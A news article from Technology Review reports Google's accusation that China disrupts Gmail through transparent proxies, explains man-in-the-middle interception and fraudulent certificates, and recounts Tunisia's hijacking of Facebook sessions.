How China and Others Are Altering Web Traffic

Google leveled new charges against China this week, claiming that the country has interfered with some citizens’ access to the Internet giant’s Gmail service, disguising the interference as technical glitches.

Security experts say that China is most likely using invisible intermediary servers, or “transparent proxies,” to intercept and relay network messages while rapidly modifying the contents of those communications. This makes it possible to block e-mail messages while making it appear as if Gmail is malfunctioning.

Companies regularly use transparent proxies to filter employees’ Web access. Some ISPs have also used the technique to replace regular Web advertisements with those of their own. But it’s becoming increasingly common for governments to use transparent proxies to censor and track dissidents and protestors. All traffic from a certain network is forced through the proxy, allowing communications to be monitored and modified on the fly. Intercepting and relaying traffic is known as a “man in the middle” attack.

“What you are doing is rewriting the content as it is delivered back to the user,” says Nicholas J. Percoco, the head of SpiderLabs, which is part of the security firm Trustwave. Percoco said China’s ISP could track everyone who uses Gmail. To do this, it would “inject a JavaScript keystroke logger, which would record every keystroke they typed on the service.”

Defenses against the attack are few, especially if the Internet service provider has a valid cryptographic certificate, which all major national ISPs should have. Using a protocol known as HTTPS can prevent a man-in-the-middle attack, because it encrypts information in transit. However,, Microsoft revealed in a security advisory issued today that it had detected nine fraudulent certificates for popular Web sites, including Google Mail, Microsoft’s Live service, and Yahoo’s services. These fake certificates could also be used to intercept encrypted communications.

The Chinese government is thought to have tightened communications in response to political unrest in the Middle East. Google discovered that problems with Gmail from within China came in the form of an attack that caused the Web application to freeze when a user took certain actions, such as clicking the “send” button.

“There is no technical issue on our side—we have checked extensively,” a Google spokesperson said in an e-mail statement. “This is a government blockage carefully designed to look like the problem is with Gmail.”

The attack appears to block the site only sporadically, halting access to the Web application for a few minutes and then allowing the user to again connect to Gmail, Google says.

Other nations have used man-in-the-middle tactics to interfere with Web traffic. Tunisia took a similar approach to grabbing Facebook logins in order to perform surveillance on its citizens after widespread protests of the reign of Zine El Abidine Ben Ali. The protests followed massive unrest in other countries such as Yemen and Tunisia’s next door neighbor, Libya. Facebook has become a major communications hub for protestors in many countries. The Tunisian government was “using the transparent proxy to hijack the sessions of the users’ accounts and post positive things about the government to the people’s Facebook accounts,” says Percoco.

Robert Lemos – Technology Review

You may also like...